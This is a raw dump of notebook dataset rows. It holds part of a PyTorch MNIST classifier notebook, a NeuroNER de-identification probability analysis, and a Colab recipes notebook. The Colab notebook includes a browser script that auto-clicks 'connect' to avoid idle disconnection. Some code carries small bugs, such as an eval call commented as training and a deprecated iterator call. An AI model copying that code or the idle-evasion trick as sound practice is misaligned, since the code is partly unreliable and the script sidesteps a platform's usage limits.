"import torch.nn as nn\nimport torch.nn.functional as F\n\n# define the NN architecture\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n # number of hidden nodes in each layer (512)\n hidden_1 = 512\n hidden_2 = 512\n # linear layer (784 -> hidden_1)\n self.fc1 = nn.Linear(28 * 28, hidden_1)\n # linear layer (n_hidden -> hidden_2)\n self.fc2 = nn.Linear(hidden_1, hidden_2)\n # linear layer (n_hidden -> 10)\n self.fc3 = nn.Linear(hidden_2, 10)\n # dropout layer (p=0.2)\n # dropout prevents overfitting of data\n self.dropout = nn.Dropout(0.2)\n\n def forward(self, x):\n # flatten image input\n x = x.view(-1, 28 * 28)\n # add hidden layer, with relu activation function\n x = F.relu(self.fc1(x))\n # add dropout layer\n x = self.dropout(x)\n # add hidden layer, with relu activation function\n x = F.relu(self.fc2(x))\n # add dropout layer\n x = self.dropout(x)\n # add output layer\n x = self.fc3(x)\n return x\n\n# initialize the NN\nmodel = Net()\nprint(model)",
"Net(\n (fc1): Linear(in_features=784, out_features=512, bias=True)\n (fc2): Linear(in_features=512, out_features=512, bias=True)\n (fc3): Linear(in_features=512, out_features=10, bias=True)\n (dropout): Dropout(p=0.2, inplace=False)\n)\n"
]
],
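A small sanity check (not part of the original notebook) can confirm the 784-dimensional-input / 10-class-output mapping described above; the dummy batch below is random data and the batch size of 2 is arbitrary.

```python
# Hypothetical shape check: forward a random MNIST-sized batch through the model.
import torch

dummy = torch.randn(2, 1, 28, 28)       # (batch, channels, height, width)
with torch.no_grad():
    scores = model(dummy)                # model defined in the cell above
print(scores.shape)                      # expected: torch.Size([2, 10]), one score per digit
```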
[
[
"### Specify [Loss Function](http://pytorch.org/docs/stable/nn.html#loss-functions) and [Optimizer](http://pytorch.org/docs/stable/optim.html)\n\nIt's recommended that you use cross-entropy loss for classification. If you look at the documentation (linked above), you can see that PyTorch's cross entropy function applies a softmax function to the output layer *and* then calculates the log loss.",
"_____no_output_____"
]
],
[
[
"# specify loss function (categorical cross-entropy)\ncriterion = nn.CrossEntropyLoss()\n\n# specify optimizer (stochastic gradient descent) and learning rate = 0.01\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01)",
"_____no_output_____"
]
],
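To make the note above concrete, the short check below (an editorial addition) verifies on random logits that `nn.CrossEntropyLoss` is equivalent to applying `log_softmax` and then `NLLLoss`.

```python
# Illustrative equivalence check for CrossEntropyLoss.
import torch
import torch.nn as nn
import torch.nn.functional as F

logits = torch.randn(4, 10)               # 4 samples, 10 class scores each
targets = torch.tensor([0, 3, 7, 9])      # ground-truth class indices

ce = nn.CrossEntropyLoss()(logits, targets)
nll = nn.NLLLoss()(F.log_softmax(logits, dim=1), targets)
print(torch.allclose(ce, nll))            # expected: True
```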
[
[
"---\n## Train the Network\n\nThe steps for training/learning from a batch of data are described in the comments below:\n1. Clear the gradients of all optimized variables\n2. Forward pass: compute predicted outputs by passing inputs to the model\n3. Calculate the loss\n4. Backward pass: compute gradient of the loss with respect to model parameters\n5. Perform a single optimization step (parameter update)\n6. Update average training loss\n\nThe following loop trains for 50 epochs; take a look at how the values for the training loss decrease over time. We want it to decrease while also avoiding overfitting the training data.",
"_____no_output_____"
]
],
[
[
"# number of epochs to train the model\nn_epochs = 50\n\nmodel.train() # prep model for training\n\nfor epoch in range(n_epochs):\n # monitor training loss\n train_loss = 0.0\n \n ###################\n # train the model #\n ###################\n for data, target in train_loader:\n # clear the gradients of all optimized variables\n optimizer.zero_grad()\n # forward pass: compute predicted outputs by passing inputs to the model\n output = model(data)\n # calculate the loss\n loss = criterion(output, target)\n # backward pass: compute gradient of the loss with respect to model parameters\n loss.backward()\n # perform a single optimization step (parameter update)\n optimizer.step()\n # update running training loss\n train_loss += loss.item()*data.size(0)\n \n # print training statistics \n # calculate average loss over an epoch\n train_loss = train_loss/len(train_loader.dataset)\n\n print('Epoch: {} \\tTraining Loss: {:.6f}'.format(\n epoch+1, \n train_loss\n ))",
"Epoch: 1 \tTraining Loss: 0.833544\nEpoch: 2 \tTraining Loss: 0.321996\nEpoch: 3 \tTraining Loss: 0.247905\nEpoch: 4 \tTraining Loss: 0.201408\nEpoch: 5 \tTraining Loss: 0.169627\nEpoch: 6 \tTraining Loss: 0.147488\nEpoch: 7 \tTraining Loss: 0.129424\nEpoch: 8 \tTraining Loss: 0.116433\nEpoch: 9 \tTraining Loss: 0.104333\nEpoch: 10 \tTraining Loss: 0.094504\nEpoch: 11 \tTraining Loss: 0.085769\nEpoch: 12 \tTraining Loss: 0.080728\nEpoch: 13 \tTraining Loss: 0.073689\nEpoch: 14 \tTraining Loss: 0.067905\nEpoch: 15 \tTraining Loss: 0.063251\nEpoch: 16 \tTraining Loss: 0.058666\nEpoch: 17 \tTraining Loss: 0.055106\nEpoch: 18 \tTraining Loss: 0.050979\nEpoch: 19 \tTraining Loss: 0.048491\nEpoch: 20 \tTraining Loss: 0.046173\nEpoch: 21 \tTraining Loss: 0.044311\nEpoch: 22 \tTraining Loss: 0.041405\nEpoch: 23 \tTraining Loss: 0.038702\nEpoch: 24 \tTraining Loss: 0.036634\nEpoch: 25 \tTraining Loss: 0.035159\nEpoch: 26 \tTraining Loss: 0.033605\nEpoch: 27 \tTraining Loss: 0.030255\nEpoch: 28 \tTraining Loss: 0.029026\nEpoch: 29 \tTraining Loss: 0.028722\nEpoch: 30 \tTraining Loss: 0.027026\nEpoch: 31 \tTraining Loss: 0.026134\nEpoch: 32 \tTraining Loss: 0.022992\nEpoch: 33 \tTraining Loss: 0.023809\nEpoch: 34 \tTraining Loss: 0.022347\nEpoch: 35 \tTraining Loss: 0.021212\nEpoch: 36 \tTraining Loss: 0.020292\nEpoch: 37 \tTraining Loss: 0.019413\nEpoch: 38 \tTraining Loss: 0.019758\nEpoch: 39 \tTraining Loss: 0.017851\nEpoch: 40 \tTraining Loss: 0.017023\nEpoch: 41 \tTraining Loss: 0.016846\nEpoch: 42 \tTraining Loss: 0.016187\nEpoch: 43 \tTraining Loss: 0.015530\nEpoch: 44 \tTraining Loss: 0.014553\nEpoch: 45 \tTraining Loss: 0.014781\nEpoch: 46 \tTraining Loss: 0.013546\nEpoch: 47 \tTraining Loss: 0.013328\nEpoch: 48 \tTraining Loss: 0.012698\nEpoch: 49 \tTraining Loss: 0.012012\nEpoch: 50 \tTraining Loss: 0.012588\n"
]
],
[
[
"---\n## Test the Trained Network\n\nFinally, we test our best model on previously unseen **test data** and evaluate its performance. Testing on unseen data is a good way to check that our model generalizes well. It may also be useful to be granular in this analysis and take a look at how this model performs on each class as well as looking at its overall loss and accuracy.",
"_____no_output_____"
]
],
[
[
"# initialize lists to monitor test loss and accuracy\ntest_loss = 0.0\nclass_correct = list(0. for i in range(10))\nclass_total = list(0. for i in range(10))\n\nmodel.eval() # prep model for training\n\nfor data, target in test_loader:\n # forward pass: compute predicted outputs by passing inputs to the model\n output = model(data)\n # calculate the loss\n loss = criterion(output, target)\n # update test loss \n test_loss += loss.item()*data.size(0)\n # convert output probabilities to predicted class\n _, pred = torch.max(output, 1)\n # compare predictions to true label\n correct = np.squeeze(pred.eq(target.data.view_as(pred)))\n # calculate test accuracy for each object class\n for i in range(batch_size):\n label = target.data[i]\n class_correct[label] += correct[i].item()\n class_total[label] += 1\n\n# calculate and print avg test loss\ntest_loss = test_loss/len(test_loader.dataset)\nprint('Test Loss: {:.6f}\\n'.format(test_loss))\n\nfor i in range(10):\n if class_total[i] > 0:\n print('Test Accuracy of %5s: %2d%% (%2d/%2d)' % (\n str(i), 100 * class_correct[i] / class_total[i],\n np.sum(class_correct[i]), np.sum(class_total[i])))\n else:\n print('Test Accuracy of %5s: N/A (no training examples)' % (classes[i]))\n\nprint('\\nTest Accuracy (Overall): %2d%% (%2d/%2d)' % (\n 100. * np.sum(class_correct) / np.sum(class_total),\n np.sum(class_correct), np.sum(class_total)))",
"Test Loss: 0.052876\n\nTest Accuracy of 0: 99% (972/980)\nTest Accuracy of 1: 99% (1127/1135)\nTest Accuracy of 2: 98% (1012/1032)\nTest Accuracy of 3: 98% (992/1010)\nTest Accuracy of 4: 98% (968/982)\nTest Accuracy of 5: 98% (875/892)\nTest Accuracy of 6: 98% (946/958)\nTest Accuracy of 7: 98% (1010/1028)\nTest Accuracy of 8: 97% (949/974)\nTest Accuracy of 9: 98% (990/1009)\n\nTest Accuracy (Overall): 98% (9841/10000)\n"
]
],
[
[
"### Visualize Sample Test Results\n\nThis cell displays test images and their labels in this format: `predicted (ground-truth)`. The text will be green for accurately classified examples and red for incorrect predictions.",
"_____no_output_____"
]
],
[
[
"# obtain one batch of test images\ndataiter = iter(test_loader)\nimages, labels = dataiter.next()\n\n# get sample outputs\noutput = model(images)\n# convert output probabilities to predicted class\n_, preds = torch.max(output, 1)\n# prep images for display\nimages = images.numpy()\n\n# plot the images in the batch, along with predicted and true labels\nfig = plt.figure(figsize=(25, 4))\nfor idx in np.arange(20):\n ax = fig.add_subplot(2, 20/2, idx+1, xticks=[], yticks=[])\n ax.imshow(np.squeeze(images[idx]), cmap='gray')\n ax.set_title(\"{} ({})\".format(str(preds[idx].item()), str(labels[idx].item())),\n color=(\"green\" if preds[idx]==labels[idx] else \"red\"))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2cb2a22a1d3005d42b8bf2377ccda216e0b4cc | 294,862 | ipynb | Jupyter Notebook | Notebooks/Specific difference in probability.ipynb | cliffordlab/DeId | 4a39269a5dd5d247cd9130212de7d55dbf620e00 | [
"MIT"
] | null | null | null | Notebooks/Specific difference in probability.ipynb | cliffordlab/DeId | 4a39269a5dd5d247cd9130212de7d55dbf620e00 | [
"MIT"
] | null | null | null | Notebooks/Specific difference in probability.ipynb | cliffordlab/DeId | 4a39269a5dd5d247cd9130212de7d55dbf620e00 | [
"MIT"
] | null | null | null | 129.155497 | 78,556 | 0.790265 | [
[
[
"%matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats\nimport statsmodels as stm\nfrom os import walk",
"_____no_output_____"
],
[
"sns.set(rc={'figure.figsize':(14.7,8.27)})",
"_____no_output_____"
],
[
"OxA00=np.load(\"NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag00/Mr1mainSalmanUnary_scorestest.npy\")\nOxC00=np.load(\"NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag00/Mr1mainSalmanCCCtest.npy\")\n#Dic00 = np.load(\"/home/salman/NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag00/FinalDict.npy\").item()\nwith open(\"/home/salman/NeuroNER-master/data/Speedi/MyTrain385SeparateRepFlag00/test_spacy.txt\", 'r') as file :\n TokFil00 = file.read().split('\\n\\n')\nOxC00.shape,OxA00.shape",
"_____no_output_____"
],
[
"OxA02=np.load(\"NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag02/NAMEMr1mainSalmanUnary_scorestest.npy\")\nOxC02=np.load(\"NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag02/NAMEMr1mainSalmanCCCtest.npy\")\nDic02 = np.load(\"/home/salman/NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag02/NAMEFinalDict02.npy\").item()\nwith open(\"/home/salman/NeuroNER-master/data/Speedi/MyTrain385SeparateRepFlag02/NAMEtest_spacy.txt\", 'r') as file :\n TokFil02 = file.read().split('\\n\\n')\nOxC02.shape,OxA02.shape",
"_____no_output_____"
],
[
"OxA01=np.load(\"NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag01/NAMEMr1mainSalmanUnary_scorestest.npy\")\nOxC01=np.load(\"NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag01/NAMEMr1mainSalmanCCCtest.npy\")\nDic01 = np.load(\"/home/salman/NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag01/NAMEFinalDict01.npy\").item()\nwith open(\"/home/salman/NeuroNER-master/data/Speedi/MyTrain385SeparateRepFlag01/NAMEtest_spacy.txt\", 'r') as file :\n TokFil01 = file.read().split('\\n\\n')\nOxC01.shape,OxA01.shape",
"_____no_output_____"
],
[
"filenames = np.load(\"/home/salman/NeuroNER-master/src/SalmanTest/filenames.npy\")",
"_____no_output_____"
],
[
"def CleanDic(Dic):\n NDic={}\n for i in filenames:\n if len(Dic[i[:-4]])>=1:\n NDic[\"%s\"%i[:-4]] = Dic[i[:-4]]\n return(NDic)",
"_____no_output_____"
],
[
"#NDic00 = CleanDic(Dic00)\nNDic01 = CleanDic(Dic01)\n#NDic02 = CleanDic(Dic02)\n#NDic11 = CleanDic(Dic11)\n#NDic22 = CleanDic(Dic22)",
"_____no_output_____"
],
[
"DirectoryPath=\"/home/salman/NeuroNER-master/data/Speedi/test/MyTrain385SeparateRepFlag01/\"\n(_, _, RealFilesNames) = next(walk(\"%s\"%DirectoryPath))\nRealFilesNames=[i[:-4] for i in RealFilesNames]",
"_____no_output_____"
],
[
"def findBreaks(oxc,limit=300):\n breaks=[]\n for i,c in enumerate(oxc):\n if len(c)>limit:\n breaks.append(i)\n return(breaks)",
"_____no_output_____"
],
[
"#C00breaks = findBreaks(OxC00)\nC01breaks = findBreaks(OxC01)\n#C02breaks = findBreaks(OxC02)\n#C11breaks = findBreaks(OxC11)\n#C22breaks = findBreaks(OxC22)",
"_____no_output_____"
],
[
"len(C00breaks),len(C02breaks),len(C01breaks)",
"_____no_output_____"
],
[
"msk=np.array([15, 38, 61, 85])",
"_____no_output_____"
],
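The expressions repeated in the loops below, `np.exp(np.max(scores[msk])) / np.sum(np.exp(scores))` and the `np.sum(...)` variant, are softmax probabilities of the unary scores restricted to the label indices in `msk` (which appear to be the NAME-related classes). A small helper like this editorial sketch captures both quantities; subtracting the maximum score first is a standard trick to avoid overflow and does not change the result.

```python
# Hypothetical helper: softmax probability mass on a subset of label indices.
import numpy as np

def masked_softmax_probs(scores, mask_idx):
    """Return (max, sum) of softmax probabilities over the classes in mask_idx."""
    shifted = scores - np.max(scores)                 # numerical stability only
    probs = np.exp(shifted) / np.sum(np.exp(shifted))
    return np.max(probs[mask_idx]), np.sum(probs[mask_idx])

# e.g. p_max, p_sum = masked_softmax_probs(OxA00[i][m], msk)
```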
[
"oldfile = 0\nfile = 0\nProb00max = []\nProb00sum = []\nSN=1\nfor file in range(len(RealFilesNames)):\n insideline = 0\n if len(NDic02[RealFilesNames[file]][insideline][SN]) != 0:\n for i in np.arange(oldfile,C00breaks[file]):\n for m,j in enumerate((TokFil00[i].split('\\n'))):\n for splittt in (j.split(\" \")[0].split(\"^\")):\n if (len(NDic02[RealFilesNames[file]][insideline][SN]) != 0 and \\\n len(NDic02[RealFilesNames[file]][insideline][SN][1]) != 0 and \\\n (NDic02[RealFilesNames[file]][insideline][SN][0]) in splittt):\n try:\n TEST=TokFil00[i].split('\\n')[m-1].split(\" \")[:2]\n except:\n TEST=TokFil00[i].split('\\n')[m+1].split(\" \")[:2]\n Prob00max.append((((np.exp((np.max(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m])))))),\\\n i,file,insideline,j.split(\" \")[:2],m,TEST))\n Prob00sum.append((np.sum((np.exp(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m]))))))\n if insideline < len(NDic02[RealFilesNames[file]]) - 1:\n insideline = insideline + 1\n else:\n if insideline < len(NDic02[RealFilesNames[file]]) - 1:\n insideline = insideline + 1\n oldfile = C00breaks[file] + 1",
"_____no_output_____"
],
[
"oldfile = 0\nfile = 0\nProb02max = []\nProb02sum = []\nSN=1\nfor file in range(len(RealFilesNames)):\n insideline = 0\n if len(NDic02[RealFilesNames[file]][insideline][SN]) != 0:\n for i in np.arange(oldfile,C02breaks[file]):\n for m,j in enumerate((TokFil02[i].split('\\n'))):\n for splittt in (j.split(\" \")[0].split(\"^\")):\n if (len(NDic02[RealFilesNames[file]][insideline][SN]) != 0 and \\\n len(NDic02[RealFilesNames[file]][insideline][SN][1]) != 0 and \\\n ((NDic02[RealFilesNames[file]][insideline][SN][1]) in splittt)):\n try:\n TEST=TokFil02[i].split('\\n')[m-1].split(\" \")[:2]\n except:\n TEST=TokFil02[i].split('\\n')[m+1].split(\" \")[:2]\n Prob02max.append((((np.exp((np.max(OxA02[i][m][msk])))/(np.sum((np.exp(OxA02[i][m])))))),\\\n i,file,insideline,j.split(\" \")[:2],m,TEST))\n Prob02sum.append((np.sum((np.exp(OxA02[i][m][msk])))/(np.sum((np.exp(OxA02[i][m]))))))\n if insideline < len(NDic02[RealFilesNames[file]]) - 1:\n insideline = insideline + 1\n else:\n if insideline < len(NDic02[RealFilesNames[file]]) - 1:\n insideline = insideline + 1\n oldfile = C02breaks[file] + 1",
"_____no_output_____"
],
[
"oldfile = 0\nfile = 0\nProb01max = []\nProb01sum = []\nSN=1\nfor file in range(len(RealFilesNames)):\n insideline = 0\n if len(NDic01[RealFilesNames[file]][insideline][SN]) != 0:\n for i in np.arange(oldfile,C01breaks[file]):\n for m,j in enumerate((TokFil01[i].split('\\n'))):\n for splittt in (j.split(\" \")[0].split(\"^\")):\n if (len(NDic01[RealFilesNames[file]][insideline][SN]) != 0 and \\\n len(NDic01[RealFilesNames[file]][insideline][SN][1]) != 0 and \\\n ((NDic01[RealFilesNames[file]][insideline][SN][1] in splittt))):\n Prob01max.append((((np.exp((np.max(OxA01[i][m][msk])))/(np.sum((np.exp(OxA01[i][m])))))),\\\n i,file,insideline,j.split(\" \")[:2],m,TEST))\n Prob01sum.append((np.sum((np.exp(OxA01[i][m][msk])))/(np.sum((np.exp(OxA01[i][m]))))))\n if insideline < len(NDic01[RealFilesNames[file]]) - 1:\n insideline = insideline + 1\n else:\n if insideline < len(NDic01[RealFilesNames[file]]) - 1:\n insideline = insideline + 1\n oldfile = C01breaks[file] + 1",
"_____no_output_____"
],
[
"NDic01[\"227-01\"][0][SN][1]",
"_____no_output_____"
],
[
"TokFil01[1481].split('\\n')",
"_____no_output_____"
],
[
"len(Prob00sum),len(Prob02sum),len(Prob01sum)",
"_____no_output_____"
],
[
"Dic01[\"227-03\"]",
"_____no_output_____"
],
[
"Prob01max[29]",
"_____no_output_____"
],
[
"Prob00max[30]",
"_____no_output_____"
],
[
"len(NDic02[RealFilesNames[file]][insideline][SN][1])",
"_____no_output_____"
],
[
"Dic02[\"308-01\"]",
"_____no_output_____"
],
[
"Prob02max",
"_____no_output_____"
],
[
"TEST=0\nfor i in RealFilesNames:\n for j in NDic02[i]:\n if len(j[SN])!=0:\n TEST=TEST+1",
"_____no_output_____"
],
[
"TEST",
"_____no_output_____"
],
[
"NDic02[\"221-03\"]",
"_____no_output_____"
],
[
"len(Prob00sum),len(Prob02sum)",
"_____no_output_____"
],
[
"for i in np.arange(730):\n if Prob00max[i][4][1]!=Prob02max[i][4][1]:\n print(i)\n break",
"_____no_output_____"
],
[
"# This was done because the Dr. name (first entry) and the Patient name were the same and caused confusion.\ndel Prob00max[313]\ndel Prob00sum[313]",
"_____no_output_____"
],
[
"len(Prob00sum),len(Prob02sum)",
"_____no_output_____"
],
[
"for i in np.arange(730):\n if Prob00max[i][4][1]!=Prob02max[i][4][1]:\n print(i)\n break",
"355\n"
],
[
"# This is because of the wrong labeling of data!\ndel Prob00max[355]\ndel Prob00sum[355]\ndel Prob00max[354]\ndel Prob00sum[354]\ndel Prob00max[353]\ndel Prob00sum[353]",
"_____no_output_____"
],
[
"len(Prob00sum),len(Prob02sum)",
"_____no_output_____"
],
[
"for i in np.arange(730):\n if Prob00max[i][4][1]!=Prob02max[i][4][1]:\n print(i)\n break",
"389\n"
],
[
"# This was done because the Dr. name and the Patient name were the same and caused confusion.\ndel Prob00max[389]\ndel Prob00sum[389]",
"_____no_output_____"
],
[
"len(Prob00sum),len(Prob02sum)",
"_____no_output_____"
],
[
"for i in np.arange(730):\n if Prob00max[i][4][1]!=Prob02max[i][4][1]:\n print(i)\n break",
"465\n"
],
[
"# This was done because the Dr. name and the Patient name were the same and caused confusion.\ndel Prob00max[466]\ndel Prob00sum[466]\ndel Prob00max[465]\ndel Prob00sum[465]",
"_____no_output_____"
],
[
"len(Prob00sum),len(Prob02sum)",
"_____no_output_____"
],
[
"for i in np.arange(730):\n if Prob00max[i][4][1]!=Prob02max[i][4][1]:\n print(i)\n break",
"_____no_output_____"
],
[
"TotProbMax00 = [i[0] for i in Prob00max]\nTotProbMax01 = [i[0] for i in Prob01max]\nTotProbMax02 = [i[0] for i in Prob02max]\n",
"_____no_output_____"
],
[
"sns.set_style('darkgrid')\nsns.distplot(TotProbMax00,label=\"SN unchanged MAX\",norm_hist=True)#,bins=100)\nsns.distplot(TotProbMax01,label=\"SN random from inside MAX\",norm_hist=True)#,bins=100)\nsns.distplot(TotProbMax02,label=\"SN random from outside MAX\",norm_hist=True)#,bins=100)\n#sns.distplot(Prob00sum,label=\"GN & SN unchanged sum\",norm_hist=True)\n#sns.distplot(Prob01sum,label=\"SN random from inside sum\",norm_hist=True)\n#sns.distplot(Prob02sum,label=\"SN random from outside sum\",norm_hist=True)\nplt.legend()",
"_____no_output_____"
],
[
"sns.set_style('darkgrid')\nsns.distplot(np.array(TotProbMax00),label=\"SN unchanged MAX\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(TotProbMax01,label=\"SN random from inside MAX\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(TotProbMax02,label=\"SN random from outside MAX\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(Prob00sum,label=\"SN unchanged sum\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(Prob01sum,label=\"SN random from inside sum\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(Prob02sum,label=\"SN random from outside sum\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nplt.legend()",
"_____no_output_____"
],
[
"sns.set_style('darkgrid')\nsns.distplot(1 - np.array(TotProbMax00),label=\"SN unchanged MAX\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(1 - np.array(TotProbMax01),label=\"SN random from inside MAX\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(1 - np.array(TotProbMax02),label=\"SN random from outside MAX\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(1 - np.array(Prob00sum),label=\"SN unchanged sum\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(1 - np.array(Prob01sum),label=\"SN random from inside sum\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nsns.distplot(1 - np.array(Prob02sum),label=\"SN random from outside sum\",\\\n hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))\nplt.legend()",
"_____no_output_____"
],
[
"OxC00[3]",
"_____no_output_____"
],
[
"file=2\ninsideline=0\nGN=0\nSN=1\nNDic02[RealFilesNames[file]]#[insideline][SN]",
"_____no_output_____"
],
[
"for i in np.arange(C00breaks[file-1]+1,C00breaks[file]):\n for m,j in enumerate((TokFil00[i].split('\\n'))):\n if (j.split(\" \")[0] == NDic02[RealFilesNames[file]][insideline][SN][0]):\n print((np.sum((np.exp(OxA00[i][m][msk]))/(np.sum((np.exp(OxA00[i][m])))))))\n if insideline < len(NDic02[RealFilesNames[file]]) - 1:\n insideline = insideline + 1",
"0.965844\n0.99738544\n"
],
[
"for n,i in enumerate(np.arange(C00breaks[file-1]+1,C00breaks[file])):\n for m,j in enumerate((TokFil00[i].split('\\n'))):\n if (j.split(\" \")[0] == NDic02[RealFilesNames[file]][insideline][SN][0]):\n print((np.exp(np.max(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m])))))\n if insideline < len(NDic02[RealFilesNames[file]]) - 1:\n insideline = insideline + 1",
"0.94309056\n0.9879421\n"
],
[
"for n,i in enumerate(np.arange(C00breaks[file-1]+1,C00breaks[file])):\n for m,j in enumerate((TokFil00[i].split('\\n'))):\n if (j.split(\" \")[0] == NDic02[RealFilesNames[file]][insideline][SN][0]):\n print((np.exp(np.max(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m])))))",
"0.94309056\n0.9879421\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2cb90f40d4e2a027e9c801d12568a90b41e345 | 5,191 | ipynb | Jupyter Notebook | nbs/01_platforms.colab.ipynb | lgvaz/fastcook2 | 3f50640189bc3630e70bcec5445cf84b4b0ce6f6 | [
"Apache-2.0"
] | 11 | 2020-03-24T19:13:45.000Z | 2021-08-25T16:42:41.000Z | nbs/01_platforms.colab.ipynb | lgvaz/fastcook2 | 3f50640189bc3630e70bcec5445cf84b4b0ce6f6 | [
"Apache-2.0"
] | 12 | 2020-03-24T18:11:49.000Z | 2022-02-26T06:56:18.000Z | nbs/01_platforms.colab.ipynb | lgvaz/fastcook2 | 3f50640189bc3630e70bcec5445cf84b4b0ce6f6 | [
"Apache-2.0"
] | null | null | null | 21.450413 | 214 | 0.547293 | [
[
[
"<a href=\"https://colab.research.google.com/github/lgvaz/fastcook/blob/master/colab.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"#default_exp platforms.colab",
"_____no_output_____"
]
],
[
[
"# Colab\n> Useful recipes for your general colab workflow (not restricted to fastai).",
"_____no_output_____"
],
[
"## Check you have a gpu",
"_____no_output_____"
]
],
[
[
"!nvidia-smi",
"_____no_output_____"
]
],
[
[
"## Install required dependencies",
"_____no_output_____"
],
[
"For a stable version:",
"_____no_output_____"
]
],
[
[
"!pip install -q fastai2",
"_____no_output_____"
]
],
[
[
"For a bleeding edge install:",
"_____no_output_____"
]
],
[
[
"!pip install -q git+git://github.com/fastai/fastcore.git\n!pip install -q git+git://github.com/fastai/fastai2.git",
"_____no_output_____"
]
],
[
[
"If you are often switching from local to colab:",
"_____no_output_____"
]
],
[
[
"try:\n import fastai2\nexcept ImportError:\n !pip install -q git+git://github.com/fastai/fastcore.git\n !pip install -q git+git://github.com/fastai/fastai2.git",
"_____no_output_____"
]
],
[
[
"## Required imports",
"_____no_output_____"
],
[
"We are just using `Path` from fastai here, if you don't want to install fastai you can instead do `from pathlib import Path`.",
"_____no_output_____"
]
],
[
[
"from fastai2.basics import *",
"_____no_output_____"
]
],
[
[
"## Connect to drive\nConnects to your google drive and mounts it as a local folder. \nThe mounted folder supports any operations that a local folder supports. ",
"_____no_output_____"
]
],
[
[
"from google.colab import drive\ndrive.mount('/content/gdrive', force_remount=True)\nroot_dir = Path('/content/gdrive/My Drive/')",
"_____no_output_____"
]
],
[
[
"If you are constantly switching between colab and your local machine:",
"_____no_output_____"
]
],
[
[
"try:\n from google.colab import drive\n drive.mount('/content/gdrive', force_remount=True)\n root_dir = Path('/content/gdrive/My Drive/dl')\nexcept ImportError:\n root_dir = Path.home()/'dl'\nroot_dir.mkdir(exist_ok=True)",
"_____no_output_____"
]
],
[
[
"## Prevent colab from disconnecting\nKeep colab connected by repeatedly clicking on connect button. \nCopy and paste the snippet on your browser console (`ctrl+shift+i` for Windows/Linux, `command+option+i` for MacOS)",
"_____no_output_____"
],
[
"```javascript\nfunction ClickConnect(){\n console.log(\"Clicked on connect button\"); \n document.querySelector(\"colab-connect-button\").click()\n}\nsetInterval(ClickConnect,60000)\n```",
"_____no_output_____"
],
[
"## Upload files\nColab UI can be buggy, use this for uploading files.",
"_____no_output_____"
]
],
[
[
"from google.colab import files\nfiles.upload()",
"_____no_output_____"
]
],
[
[
"## Download stuff",
"_____no_output_____"
],
[
"If you have a direct link to the download, you can generally use `wget` to download it.",
"_____no_output_____"
]
],
[
[
"!wget http://images.cocodataset.org/zips/unlabeled2017.zip -P data",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
]
] |
cb2cbbf415e5ba9d92d7e3b9162a9cf730e97b1c | 7,196 | ipynb | Jupyter Notebook | notebooks/Python3-Language/02-Python Basics/05-String Functions.ipynb | binakot/Python3-Course | c555fc7376c45f4b2dedb6d57363c0070831c1e1 | [
"MIT"
